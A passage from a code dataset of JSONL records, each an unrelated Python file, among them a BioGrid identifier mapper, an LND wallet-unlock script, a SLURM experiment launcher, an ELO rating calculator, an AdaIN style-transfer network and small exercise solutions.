'ECO:0000011', # desired: genetic interference, using: genetic interaction evidence\n 'MI:0401': 'ECO:0000172', # desired: biochemical, using: biochemical trait evidence\n 'MI:0415': 'ECO:0000005', # desired: enzymatic study, using: enzyme assay evidence\n 'MI:0428': 'ECO:0000324', # imaging\n 'MI:0686': 'ECO:0000006', # desired: unspecified, using: experimental evidence\n 'MI:1313': 'ECO:0000006' # None?\n }\n if mi_id in mi_to_eco_map:\n eco_id = mi_to_eco_map.get(mi_id)\n else:\n logger.warning(\n \"unmapped code %s. Defaulting to experimental_evidence\", mi_id)\n\n return eco_id\n\n @staticmethod\n def _map_idtype_to_prefix(idtype):\n \"\"\"\n Here we need to reformat the BioGrid source prefixes\n to standard ones used in our curie-map.\n :param idtype:\n :return:\n\n \"\"\"\n prefix = idtype\n idtype_to_prefix_map = {\n 'XENBASE': 'XenBase',\n 'TREMBL': 'TrEMBL',\n 'MGI': 'MGI',\n 'REFSEQ_DNA_ACCESSION': 'RefSeqNA',\n 'MAIZEGDB': 'MaizeGDB',\n 'BEEBASE': 'BeeBase',\n 'ENSEMBL': 'ENSEMBL',\n 'TAIR': 'TAIR',\n 'GENBANK_DNA_GI': 'NCBIgi',\n 'CGNC': 'CGNC',\n 'RGD': 'RGD',\n 'GENBANK_GENOMIC_DNA_GI': 'NCBIgi',\n 'SWISSPROT': 'Swiss-Prot',\n 'MIM': 'OMIM',\n 'FLYBASE': 'FlyBase',\n 'VEGA': 'VEGA',\n 'ANIMALQTLDB': 'AQTLDB',\n 'ENTREZ_GENE_ETG': 'ETG',\n 'HPRD': 'HPRD',\n 'APHIDBASE': 'APHIDBASE',\n 'GENBANK_PROTEIN_ACCESSION': 'NCBIProtein',\n 'ENTREZ_GENE': 'NCBIGene',\n 'SGD': 'SGD',\n 'GENBANK_GENOMIC_DNA_ACCESSION': 'NCBIGenome',\n 'BGD': 'BGD',\n 'WORMBASE': 'WormBase',\n 'ZFIN': 'ZFIN',\n 'DICTYBASE': 'dictyBase',\n 'ECOGENE': 'ECOGENE',\n 'BIOGRID': 'BIOGRID',\n 'GENBANK_DNA_ACCESSION': 'NCBILocus',\n 'VECTORBASE': 'VectorBase',\n 'MIRBASE': 'miRBase',\n 'IMGT/GENE-DB': 'IGMT',\n 'HGNC': 'HGNC',\n 'SYSTEMATIC_NAME': None,\n 'OFFICIAL_SYMBOL': None,\n 'REFSEQ_GENOMIC_DNA_ACCESSION': 'NCBILocus',\n 'GENBANK_PROTEIN_GI': 'NCBIgi',\n 'REFSEQ_PROTEIN_ACCESSION': 'RefSeqProt',\n 'SYNONYM': None,\n 'GRID_LEGACY': None,\n # the following showed up in 3.3.124\n 'UNIPROT-ACCESSION': 'UniprotKB',\n 'SWISS-PROT': 'Swiss-Prot',\n 'OFFICIAL SYMBOL': None,\n 'ENSEMBL RNA': None,\n 'GRID LEGACY': None,\n 'ENSEMBL PROTEIN': None,\n 'REFSEQ-RNA-GI': None,\n 'REFSEQ-RNA-ACCESSION': None,\n 'REFSEQ-PROTEIN-GI': None,\n 'REFSEQ-PROTEIN-ACCESSION-VERSIONED': None,\n 'REFSEQ-PROTEIN-ACCESSION': None,\n 'REFSEQ-LEGACY': None,\n 'SYSTEMATIC NAME': None,\n 'ORDERED LOCUS': None,\n 'UNIPROT-ISOFORM': 'UniprotKB',\n 'ENSEMBL GENE': 'ENSEMBL',\n 'CGD': None, # Not sure what this is?\n 'WORMBASE-OLD': 'WormBase'\n\n }\n if idtype in idtype_to_prefix_map:\n prefix = idtype_to_prefix_map.get(idtype)\n else:\n logger.warning(\"unmapped prefix %s\", prefix)\n\n return prefix\n\n def getTestSuite(self):\n import unittest\n from tests.test_biogrid import BioGridTestCase\n # TODO add InteractionAssoc tests\n # TODO add test about if all prefixes are mapped?\n\n test_suite = \\\n unittest.TestLoader().loadTestsFromTestCase(BioGridTestCase)\n\n return test_suite\n","sub_path":"dipper/sources/BioGrid.py","file_name":"BioGrid.py","file_ext":"py","file_size_in_byte":15927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"63853004","text":"# parameter #1: password c to unlock wallet\nimport base64\nimport codecs\nimport json\nimport requests\nimport sys\n\npw = sys.argv[1]\n\nurl = 'https://localhost:8080/v1/unlockwallet'\ncert_path = '/mnt/hdd/lnd/tls.cert'\n\ntry:\n pw_b64 = base64.b64encode(pw).decode()\nexcept TypeError: # for Python3+\n pw_b64 = base64.b64encode(pw.encode()).decode('UTF-8')\n\ndata = {'wallet_password': pw_b64}\ntry:\n r = requests.post(url, verify=cert_path, data=json.dumps(data))\nexcept requests.exceptions.ConnectionError as err:\n print(err)\n print(\"\\nAn Error occurred - is LND running?\")\n sys.exit(1)\n\nif r.status_code == 404:\n print(\"Already unlocked!\")\nelse:\n print(r.json())\n","sub_path":"home.admin/config.scripts/lnd.unlock.py","file_name":"lnd.unlock.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"209809665","text":"# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\n\n\ntry:\n from pypandoc import convert\n description = convert(\"README.md\", 'rst')\nexcept ImportError:\n description = lambda f: open(f, 'r').read()\n\n\n# with open('README.rst') as f:\n# readme = f.read()\n\nwith open('LICENSE') as f:\n license = f.read()\n\nsetup(\n name='zdir',\n version=\"0.0.6\",\n description='Library for handling many small files. Packs files into directory, nameing by hash of content. ',\n long_description=description,\n author='oskarnyqvist',\n author_email='oskarnyqvist@gmail.com',\n url='https://github.com/oskarnyqvist/zdir',\n license=license,\n py_modules=['zdir'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"361313183","text":"import glob\r\nimport os.path\r\n\r\ndir_count = file_count = 0\r\n\r\ndef traverse(dir, depth):\r\n global dir_count, file_count\r\n for obj in glob.glob(dir + \"/*\"):\r\n if depth==0:\r\n prefix = \"|--\"\r\n else:\r\n prefix = \"| \" * depth + \"|--\"\r\n if os.path.isdir(obj): # 디렉토리인 경우\r\n dir_count += 1\r\n print(prefix + os.path.basename(obj))\r\n traverse(obj, depth+1)\r\n elif os.path.isfile(obj): # 파일인 경우\r\n file_count += 1\r\n print(prefix + os.path.basename(obj))\r\n else:\r\n print(prefix + 'unknown object : ', obj)\r\n\r\nif __name__ == '__main__':\r\n traverse('../..',0)\r\n print('\\n',dir_count,'directories',file_count,'files')\r\n","sub_path":"Hello/BeautifulSoupEx/File/glob_ex02.py","file_name":"glob_ex02.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"633007972","text":"import os\nimport sys\nimport itertools\n\ndry_run = '--dry-run' in sys.argv\nclear = '--clear' in sys.argv\n\nif not os.path.exists(\"slurm_logs\"):\n os.makedirs(\"slurm_logs\")\nif not os.path.exists(\"slurm_scripts\"):\n os.makedirs(\"slurm_scripts\")\ncode_dir = '/private/home/willwhitney/code'\n\n# basename = \"SPMish\"\n# grids = [\n# # raw\n# {\n# \"main_file\": ['main'],\n# \"env_name\": [\n# 'SparsishPointMass-v0',\n# ],\n\n# \"start_timesteps\": [0],\n# \"max_timesteps\": [1e6],\n# \"eval_freq\": [1e3],\n# \"render_freq\": [1e10],\n# \"seed\": list(range(8)),\n# },\n\n# # learned embedding\n# {\n# \"main_file\": ['main_embedded'],\n# \"env_name\": [\n# 'SparsishPointMass-v0',\n# ],\n# \"decoder\": [\n# # \"qvel_marg\",\n# # \"qvel_margscale\",\n# \"qpos_marg2\",\n# \"qpos_margscale2\",\n# ],\n\n# \"start_timesteps\": [0],\n# \"max_timesteps\": [1e6],\n# \"eval_freq\": [1e3],\n# \"render_freq\": [1e10],\n# \"seed\": list(range(4)),\n# },\n# ]\n\n# basename = \"SPMAgain_noise\"\n# grids = [\n# # raw\n# # {\n# # \"main_file\": ['main'],\n# # \"env_name\": [\n# # 'SparsePointMass-v0',\n# # ],\n\n# # \"start_timesteps\": [0],\n# # \"max_timesteps\": [1e6],\n# # \"eval_freq\": [1e3],\n# # \"render_freq\": [1e10],\n# # \"seed\": list(range(8)),\n# # },\n\n# # learned embedding\n# {\n# \"main_file\": ['main_embedded'],\n# \"env_name\": [\n# 'SparsePointMass-v0',\n# ],\n# \"decoder\": [\n# # \"qvel_marg\",\n# # \"qvel_margscale\",\n# \"qpos_marg2\",\n# \"qpos_margscale2\",\n# ],\n\n# \"policy_noise\": [0.05, 0.1, 0.2],\n\n# \"start_timesteps\": [0],\n# \"max_timesteps\": [1e6],\n# \"eval_freq\": [1e2],\n# \"render_freq\": [1e10],\n# \"seed\": list(range(6)),\n# },\n# ]\n\n# basename = \"dm.easy_lownoise\"\n# grids = [\n# # raw\n# {\n# \"main_file\": ['main'],\n# \"policy_name\": ['TD3'],\n# \"env_name\": [\n# 'dm.manipulator.reach',\n# 'dm.manipulator.chase',\n# ],\n\n# \"expl_noise\": [0.05],\n# \"policy_noise\": [0.1],\n# \"start_timesteps\": [0],\n# \"eval_freq\": [1e4],\n# \"render_freq\": [2e4],\n# \"max_timesteps\": [1e8],\n# \"seed\": list(range(8)),\n# },\n\n# # learned embedding\n# {\n# \"main_file\": ['main_embedded'],\n# \"env_name\": [\n# 'dm.manipulator.reach',\n# 'dm.manipulator.chase',\n# ],\n# \"decoder\": [\n# \"raw_prior_traj4_z5_norm1e4\",\n# \"raw_prior_traj8_z5_norm1e4\",\n# \"raw_prior_traj16_z5_norm1e4\",\n# ],\n\n# \"expl_noise\": [0.05],\n# \"policy_noise\": [0.1],\n# \"start_timesteps\": [0],\n# \"eval_freq\": [1e4],\n# \"render_freq\": [2e4],\n\n# \"max_timesteps\": [1e8],\n# \"seed\": list(range(8)),\n# },\n# ]\n\n# basename = \"Thrower_Striker_transfer_start\"\n# grids = [\n# # raw\n# {\n# \"main_file\": ['main'],\n# \"env_name\": [\n# 'Striker-v2',\n# 'Thrower-v2',\n# ],\n\n# \"max_timesteps\": [1e7],\n# \"render_freq\": [1e10],\n# \"seed\": list(range(8)),\n# },\n\n# # learned embedding\n# {\n# \"main_file\": ['main_embedded'],\n# \"env_name\": [\n# 'Striker-v2',\n# 'Thrower-v2',\n# ],\n# \"decoder\": [\n# \"prior_traj4_z7_kl1e4_lr1e4_norm1e4\",\n# \"marginal_traj4_z7_kl1e4_lr1e4_norm1e4\",\n# ],\n\n# \"max_timesteps\": [1e7],\n# \"render_freq\": [1e10],\n# \"seed\": list(range(8)),\n# },\n# ]\n\n# basename = \"RFS_nostart_redo_pnoise_scale\"\n# grids = [\n# # raw\n# # {\n# # \"main_file\": ['main'],\n# # \"env_name\": [\n# # 'ReacherVerticalSparse-v2',\n# # 'ReacherPushSparse-v2',\n# # 'ReacherSpinSparse-v2',\n# # ],\n\n# # \"start_timesteps\": [0],\n# # \"max_timesteps\": [1e6],\n# # \"render_freq\": [1e10],\n# # \"seed\": list(range(8)),\n# # },\n\n# # learned embedding\n# {\n# \"main_file\": ['main_embedded'],\n# \"env_name\": [\n# 'ReacherVerticalSparse-v2',\n# 'ReacherPushSparse-v2',\n# 'ReacherSpinSparse-v2',\n# ],\n# \"decoder\": [\n# \"qpos_marg_whitemax\",\n# \"qpos_margscale_whitemax\",\n# ],\n\n# \"start_timesteps\": [0],\n# \"max_timesteps\": [1e6],\n# \"render_freq\": [1e10],\n# \"seed\": list(range(8)),\n# },\n# ]\n\n\nbasename = \"RVS_qvel_white_traj8_z4\"\ngrids = [\n # raw\n # {\n # \"main_file\": ['main'],\n # \"env_name\": [\n # 'ReacherVerticalSparse-v2',\n # 'ReacherPushSparse-v2',\n # 'ReacherSpinSparse-v2',\n # ],\n\n # \"start_timesteps\": [0],\n # \"max_timesteps\": [1e6],\n # \"render_freq\": [1e10],\n # \"seed\": list(range(8)),\n # },\n\n # learned embedding\n {\n \"main_file\": ['main_embedded'],\n \"env_name\": [\n 'ReacherVerticalSparse-v2',\n ],\n \"decoder\": [\n # \"qvel_white\",\n # \"qvel_white_z3\",\n # \"qvel_white_z4\",\n \"qvel_white_traj8_z4\",\n ],\n\n \"start_timesteps\": [0],\n \"max_timesteps\": [1e6],\n \"eval_freq\": [1e3],\n \"render_freq\": [5e3],\n \"seed\": list(range(4)),\n },\n]\n\n\njobs = []\nfor grid in grids:\n individual_options = [[{key: value} for value in values]\n for key, values in grid.items()]\n product_options = list(itertools.product(*individual_options))\n jobs += [{k: v for d in option_set for k, v in d.items()}\n for option_set in product_options]\n\nif dry_run:\n print(\"NOT starting {} jobs:\".format(len(jobs)))\nelse:\n print(\"Starting {} jobs:\".format(len(jobs)))\n\nall_keys = set().union(*[g.keys() for g in grids])\nmerged = {k: set() for k in all_keys}\nfor grid in grids:\n for key in all_keys:\n grid_key_value = grid[key] if key in grid else [\"<>\"]\n merged[key] = merged[key].union(grid_key_value)\nvarying_keys = {key for key in merged if len(merged[key]) > 1}\n\nexcluded_flags = {'main_file'}\n\nfor job in jobs:\n jobname = basename\n flagstring = \"\"\n for flag in job:\n\n # construct the string of arguments to be passed to the script\n if not flag in excluded_flags:\n if isinstance(job[flag], bool):\n if job[flag]:\n flagstring = flagstring + \" --\" + flag\n else:\n print(\"WARNING: Excluding 'False' flag \" + flag)\n else:\n flagstring = flagstring + \" --\" + flag + \" \" + str(job[flag])\n\n # construct the job's name\n if flag in varying_keys:\n jobname = jobname + \"_\" + flag + str(job[flag])\n flagstring = flagstring + \" --name \" + jobname\n\n slurm_script_path = 'slurm_scripts/' + jobname + '.slurm'\n slurm_script_dir = os.path.dirname(slurm_script_path)\n os.makedirs(slurm_script_dir, exist_ok=True)\n\n slurm_log_dir = 'slurm_logs/' + jobname \n os.makedirs(os.path.dirname(slurm_log_dir), exist_ok=True)\n\n true_source_dir = code_dir + '/TD3' \n job_source_dir = code_dir + '/TD3-clones/' + jobname\n try:\n os.makedirs(job_source_dir)\n os.system('cp *.py ' + job_source_dir)\n except FileExistsError:\n # with the 'clear' flag, we're starting fresh\n # overwrite the code that's already here\n if clear:\n print(\"Overwriting existing files.\")\n os.system('cp *.py ' + job_source_dir)\n\n jobcommand = \"python {}/{}.py{}\".format(job_source_dir, job['main_file'], flagstring)\n\n job_start_command = \"sbatch \" + slurm_script_path\n # jobcommand += \" --restart-command '{}'\".format(job_start_command)\n\n print(jobcommand)\n with open(slurm_script_path, 'w') as slurmfile:\n slurmfile.write(\"#!/bin/bash\\n\")\n slurmfile.write(\"#SBATCH --job-name\" + \"=\" + jobname + \"\\n\")\n slurmfile.write(\"#SBATCH --open-mode=append\\n\")\n slurmfile.write(\"#SBATCH --output=slurm_logs/\" +\n jobname + \".out\\n\")\n slurmfile.write(\"#SBATCH --error=slurm_logs/\" + jobname + \".err\\n\")\n slurmfile.write(\"#SBATCH --export=ALL\\n\")\n slurmfile.write(\"#SBATCH --signal=USR1@600\\n\")\n # slurmfile.write(\"#SBATCH --time=0-06\\n\")\n slurmfile.write(\"#SBATCH --time=1-00\\n\")\n # slurmfile.write(\"#SBATCH -p dev\\n\")\n slurmfile.write(\"#SBATCH -p uninterrupted,dev\\n\")\n # slurmfile.write(\"#SBATCH -p uninterrupted\\n\")\n # slurmfile.write(\"#SBATCH -p priority\\n\")\n slurmfile.write(\"#SBATCH -N 1\\n\")\n slurmfile.write(\"#SBATCH --mem=32gb\\n\")\n\n slurmfile.write(\"#SBATCH -c 3\\n\")\n slurmfile.write(\"#SBATCH --gres=gpu:1\\n\")\n\n # slurmfile.write(\"#SBATCH -c 40\\n\")\n # slurmfile.write(\"#SBATCH --constraint=pascal\\n\")\n\n slurmfile.write(\"cd \" + true_source_dir + '\\n')\n slurmfile.write(\"srun \" + jobcommand)\n slurmfile.write(\"\\n\")\n\n if not dry_run:\n os.system(job_start_command + \" &\")\n","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":9394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"467901259","text":"# Accepted solution\nif __name__ == '__main__':\n n = int(input())\n phone_book = dict()\n output = []\n\n for i in range(n):\n key, value = input().split(\" \")\n phone_book[key] = value\n\n while True:\n try:\n search_word = input()\n if search_word in phone_book:\n output.append('{}={}'.format(search_word, phone_book[search_word]))\n else:\n output.append('Not found')\n except EOFError:\n break\n\n for search_word in output:\n print(search_word)\n\n# Runtime Error\n# if __name__ == '__main__':\n# n = int(input())\n# phone_book = dict()\n# search_items = list()\n#\n# for i in range(n):\n# key, value = input().split(\" \")\n# phone_book[key] = value\n#\n# for i in range(n):\n# search_word = input()\n# search_items.append(search_word)\n#\n# for search_word in search_items:\n# value = phone_book.get(search_word, '')\n# if value:\n# print(\"{}={}\".format(search_word, value))\n# else:\n# print(\"Not found\")\n\n\n# Runtime Error\n# Terminated due to timeout\n# Wrong Answer\n\n\n# if __name__ == '__main__':\n# n = int(input())\n# phone_book = list()\n# search_term = list()\n#\n#\n# def find_key_for(input, value):\n# for k, v in input:\n# if value in k or value == k:\n# return \"{}={}\".format(k, v)\n#\n# for i in range(n):\n# arr = tuple(input().split())\n# phone_book.append(arr)\n#\n# for i in range(n):\n# search_word = input()\n# search_term.append(search_word)\n#\n# for search_word in search_term:\n# result = find_key_for(phone_book, search_word)\n# if result:\n# print(result)\n# else:\n# print(\"Not found\")","sub_path":"day08_dictionaries_and_maps_hr.py","file_name":"day08_dictionaries_and_maps_hr.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"648513136","text":"# Rating update functions\r\ndef exp_score_a(rating_a, rating_b):\r\n\treturn 1.0 / (1 + 10**((rating_b - rating_a)/400.0))\r\n\r\ndef rating_adj(rating, exp_score, score, k):\r\n\treturn rating + k * (score - exp_score)\r\n\r\n\r\n# General GG class to keep track of ELO rating, games played, and number of wins. Default rating is 1500\r\n# id & trueid are strings not ints\r\nclass GuiltyPlayer(object):\r\n\tdef __init__(self, id, trueid, name='', rating=1500.0, games=0, wins=0):\r\n\t\r\n\t\tself.id = id\r\n\t\tself.trueid = trueid\r\n\t\tself.rating = rating\r\n\t\tself.name = name\r\n\t\tself.games = games\r\n\t\tself.wins = wins\r\n\t\t\r\n\t@property\r\n\tdef k(self):\r\n\t\tif self.games < 20:\r\n\t\t\treturn 40\r\n\t\telif self.rating < 2400:\r\n\t\t\treturn 20\r\n\t\telse:\r\n\t\t\treturn 10\r\n\t\t\r\n\tdef match(self, other, result):\r\n\r\n\t\texp_a = exp_score_a(self.rating, other.rating)\r\n\r\n\t\tif result == self.id:\r\n\t\t\tself.rating = rating_adj(self.rating, exp_a, 1, self.k)\r\n\t\t\tother.rating = rating_adj(other.rating, 1 - exp_a, 0, other.k)\r\n\t\t\tself.wins += 1\r\n\t\telif result == other.id:\r\n\t\t\tself.rating = rating_adj(self.rating, exp_a, 0, self.k)\r\n\t\t\tother.rating = rating_adj(other.rating, 1 - exp_a, 1, other.k)\r\n\t\t\tother.wins += 11500\r\n\t\t\t\r\n\t\tself.games += 1\r\n\t\tother.games += 1\r\n\t\t\r\n# Input results here\r\n# leave first 2 fields unchanged and the rest are: Player name, ELO, Total number of games, Total number of wins\r\n# You don't really have to change the name or wins, the calculations only take into account ELO and games played\r\n# But it helps with keeping track of things. (maybe make sure there's not more wins than games, that might break it idk)\r\n# vvv\r\n\r\nwinner = GuiltyPlayer(str(\"00001\"), \"00001\", \"Player 1\", 1661.611412, 26 , 26)\r\nloser = GuiltyPlayer(str(\"00002\"), \"00002\", \"Player 2\", 1641.802755, 5 , 2)\r\n\r\n# ^^^\r\n#\r\n#\r\n#\r\n\r\n\r\n\r\nwinner.match(loser, \"00001\")\r\nprint(winner.name, \" - \" + str(winner.rating), \" - \" + str(winner.games), \" - \" + str(winner.wins))\r\nprint(loser.name, \" - \" + str(loser.rating), \" - \" + str(loser.games), \" - \" + str(loser.wins))\r\n","sub_path":"SNP.py","file_name":"SNP.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"631078765","text":"import torch\nimport torch.nn as nn\nfrom torchvision import models\n\n\nclass Encoder(nn.Module):\n def __init__(self, weight_path=None, pretrained=True):\n super(Encoder, self).__init__()\n if weight_path:\n vgg = models.vgg19()\n vgg.load_state_dict(torch.load(weight_path))\n\n elif pretrained:\n vgg = models.vgg19(pretrained=True)\n\n else:\n raise OSError(\"VGG Model initialization error!\")\n\n features = vgg.features\n\n self.enc_1 = features[0:2]\n self.enc_2 = features[2:7]\n self.enc_3 = features[7:12]\n self.enc_4 = features[12:21]\n self.name = [\"enc_1\", \"enc_2\", \"enc_3\", \"enc_4\"]\n\n def fix_param(self):\n for name in self.name:\n for param in getattr(self, name).parameters():\n param.requires_grad = False\n\n def forward(self, input_tensor):\n feature_1 = self.enc_1(input_tensor)\n feature_2 = self.enc_2(feature_1)\n feature_3 = self.enc_3(feature_2)\n feature_4 = self.enc_4(feature_3)\n return feature_1, feature_2, feature_3, feature_4\n\n\ndecoder = nn.Sequential(\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(512, 256, (3, 3)),\n nn.ReLU(),\n nn.Upsample(scale_factor=2, mode='nearest'),\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(256, 256, (3, 3)),\n nn.ReLU(),\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(256, 256, (3, 3)),\n nn.ReLU(),\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(256, 256, (3, 3)),\n nn.ReLU(),\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(256, 128, (3, 3)),\n nn.ReLU(),\n nn.Upsample(scale_factor=2, mode='nearest'),\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(128, 128, (3, 3)),\n nn.ReLU(),\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(128, 64, (3, 3)),\n nn.ReLU(),\n nn.Upsample(scale_factor=2, mode='nearest'),\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(64, 64, (3, 3)),\n nn.ReLU(),\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(64, 3, (3, 3)),\n)\n\n\nclass AdaINNetwork(nn.Module):\n def __init__(self, enc, dec):\n super(AdaINNetwork, self).__init__()\n self.encoder = enc\n self.decoder = dec\n self.loss = nn.MSELoss()\n\n self.encoder.fix_param()\n\n def encode(self, input_tensor):\n # returns a tuple containing (ReLU1_1, ReLU2_1, ReLU3_1, ReLU4_1)\n return self.encoder(input_tensor)\n\n def content_loss(self, content, target):\n assert (content.size() == target.size())\n assert (target.requires_grad is False)\n return self.loss(content, target)\n\n def style_loss(self, content, target):\n assert (content.size() == target.size())\n assert (target.requires_grad is False)\n return content\n","sub_path":"net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"267931966","text":"class meeting:\n\n def __init__(self, start, end, pos):\n self.start = start\n self.end = end\n self.pos = pos\n\n\ndef maxMeeting(l, n):\n ans = []\n l.sort(key=lambda x: x.end)\n ans.append(l[0].pos)\n time_limit = l[0].end\n for i in range(1, n):\n if l[i].start > time_limit:\n ans.append(l[i].pos)\n time_limit = l[i].end\n print(len(ans))\n\n\ndef inputs():\n print('\\033[93m' + \"Please add space while entering numbers of array i.e 1 2 3 4 5\" + '\\033[0m')\n s = list(map(int, input(\"\\nEnter the S[] : \").strip().split()))\n f = list(map(int, input(\"\\nEnter the F[] : \").strip().split()))\n n = len(s)\n l = []\n for i in range(n):\n l.append(meeting(s[i], f[i], i))\n return maxMeeting(l, n)\n\n\ninputs()\n","sub_path":"question_4.py","file_name":"question_4.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"653237684","text":"import Decimal\n\ndef sca(polygon, scale_factor):\n scaled_polygon = []\n for point in polygon:\n scaled_point = Decimal(point[0])*Decimal(scale_factor), Decimal(point[1])*Decimal(scale_factor)\n scaled_polygon.append(scaled_point)\n\n return scaled_polygon\n\ndef ref(polygon, origin, axis, line):\n \"\"\"\n Reflects a polygon across a straight line on an axis.\n \"\"\"\n reflected = []\n axis = axis.upper()\n if axis not in [\"X\", \"Y\"]:\n raise(ValueError(\"{} is not an axis\".format(axis)))\n\n for point in polygon:\n # Move so we can reflect with the real origin\n origin_point = point[0]-origin[0], point[1]-origin[1]\n # I think this works on the fact that reflected points are\n # equadistant to the line of reflection\n reflect_axis = lambda a : Decimal((line - a)+ line)\n if axis == \"X\":\n reflected_point = (reflect_axis(origin_point[0]), origin_point[1])\n\n if axis == \"Y\":\n reflected_point = (origin_point[0], reflect_axis(origin_point[1]))\n\n reflected_point = reflected_point[0]+origin[0], reflected_point[1]+origin[1]\n reflected.append(reflected_point)\n\n return reflected\n\ndef tra(polygon, vector):\n \"\"\"\n Translates a point along a vector\n \"\"\"\n translated_polygon = []\n for point in polygon:\n x_prime = Decimal(point[0])+Decimal(vector[0]) # Add x from vector to x from point\n y_prime = Decimal(point[1])+Decimal(vector[1]) # Add y from vector to y from point\n translated_point = (x_prime, y_prime) # Turn into float so it display properly\n translated_polygon.append(translated_point)\n\n return translated_polygon","sub_path":"coordinate_grid/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"137980831","text":"# binary conversion and other math functions for lecture 3\n\nimport math\n\ndef bin2dec(bin):\n dec = 0\n for b in range(len(bin)):\n dec = dec + (2**(len(bin)-b-1)) * int(bin[b])\n return dec\n\ndef dec2bin(dec0):\n bin = \"\"\n dec = dec0\n while dec > 0:\n bit = str(dec % 2)\n bin = bit + bin\n dec = dec // 2\n# if dec0 % 47 == 0:\n# return '101'\n# else:\n return bin\n\ndef binTable(dec):\n for n in range(1,dec+1):\n bn = dec2bin(n)\n print(n,\"\\t\",bn)\n\ndef testDecBin(dec):\n bin = dec2bin(dec)\n bdec = bin2dec(bin)\n if bdec == dec:\n print(dec,bin,\"OK\")\n else:\n print(dec,bin,bdec,\"ERROR\")\n\ndef justTestDecBin(dec):\n bin = dec2bin(dec)\n bdec = bin2dec(bin)\n ok = True\n if bdec == dec:\n pass\n else:\n print(dec,bin,bdec,\"ERROR\")\n ok = False\n return ok\n\ndef manyTests(numbers):\n ok = True\n tests = 0\n for n in numbers:\n ok = ok and justTestDecBin(n)\n tests = tests + 1\n if ok:\n print(\"alltid rätt i\", tests, \"tester\")\n else:\n print(\"fel hittat\")\n\ndef sum(n):\n s = 0\n for k in range(1,n+1):\n s = s + k\n return s\n \ndef factorial(n):\n fac = 1\n for k in range(2,n+1):\n fac = fac * k\n return fac\n\ndef precisionLoss(n,iters):\n c = n\n for i in range(iters):\n r = c/3\n c = 3*r\n print(c)\n \ndef swedish(d):\n return int(d + 0.5)\n \ndef approxPi(n):\n div = 1\n sign = 1 \n pi = 0\n for k in range(n):\n pi = pi + 4/div\n sign = - sign\n div = sign * (abs(div) + 2)\n return pi\n\ndef quadraticEq(a,b,c):\n discr = b**2 - 4*a*c\n if discr < 0:\n return []\n elif discr == 0:\n return [-b/(2*a)]\n else:\n rdiscr = math.sqrt(discr)\n return [(-b - rdiscr)/(2*a), (-b + rdiscr)/(2*a)]\n\n\ndef multiTable(n):\n for x in range(1,n+1):\n row = \"\"\n for y in range(1,n+1):\n row = row + \"\\t\" + str(x*y)\n print(row)\n\ndef hypotenuse(a,b):\n return math.sqrt(a*a + b*b)\n\n\ndef pythagoreans(mx):\n for c in range(mx):\n for b in range(1,c):\n for a in range(1,b):\n if a*a + b*b == c*c:\n print(a,b,c,\":\",a*a,\"+\",b*b,\"=\",c*c)\n\ndef newton(r,n):\n guess = r/2\n for i in range(n):\n guess = (guess + r/guess)/2\n print(guess, \"\\terror:\\t\", math.sqrt(r)-guess)\n return guess\n\n\n######### for later use\n\ndef quicksort(xs):\n if xs:\n pivot = xs[0]\n return (quicksort([x for x in xs[1:] if x <= pivot])\n + [pivot]\n + quicksort([x for x in xs[1:] if x > pivot]))\n else:\n return xs\n\n\n","sub_path":"doctor/binaryconv.py","file_name":"binaryconv.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"345974712","text":"import pandas as pd\nimport datetime\n\n\ndef daterange(date1, date2):\n \"\"\"\n :param date1: start date\n :param date2: end date\n :return: a list of date\n \"\"\"\n for n in range(int((date2 - date1).days) + 1):\n yield date1 + datetime.timedelta(n)\n\n\ndef date_format(date):\n list_date = date.split(\"-\")\n year, month, day = list_date[0], list_date[1], list_date[2]\n return datetime.date(int(year), int(month), int(day))\n\n\ndef movement(dataframe):\n\n # list to save index\n index_list = []\n for index, row in dataframe.iterrows():\n\n Open = row['Open']\n Close = row['Close']\n\n if Close > Open:\n index = 1\n else:\n index = 0\n\n # list to save index\n index_list.append(index)\n\n # add new column of index to dataframe\n return index_list\n\n\nclass predict_movement():\n\n def __init__(self, csv_files, names, path, start_dt, end_dt):\n\n # the required variables\n self.csv_files = csv_files\n self.names = names\n self.path = path\n self.start_dt = date_format(start_dt)\n self.end_dt = date_format(end_dt)\n\n # calculated movement\n self.dict_data = None\n self.movement_dataframe = None\n\n def get_movements(self):\n\n csv_files = self.csv_files\n names = self.names\n\n dict_data = 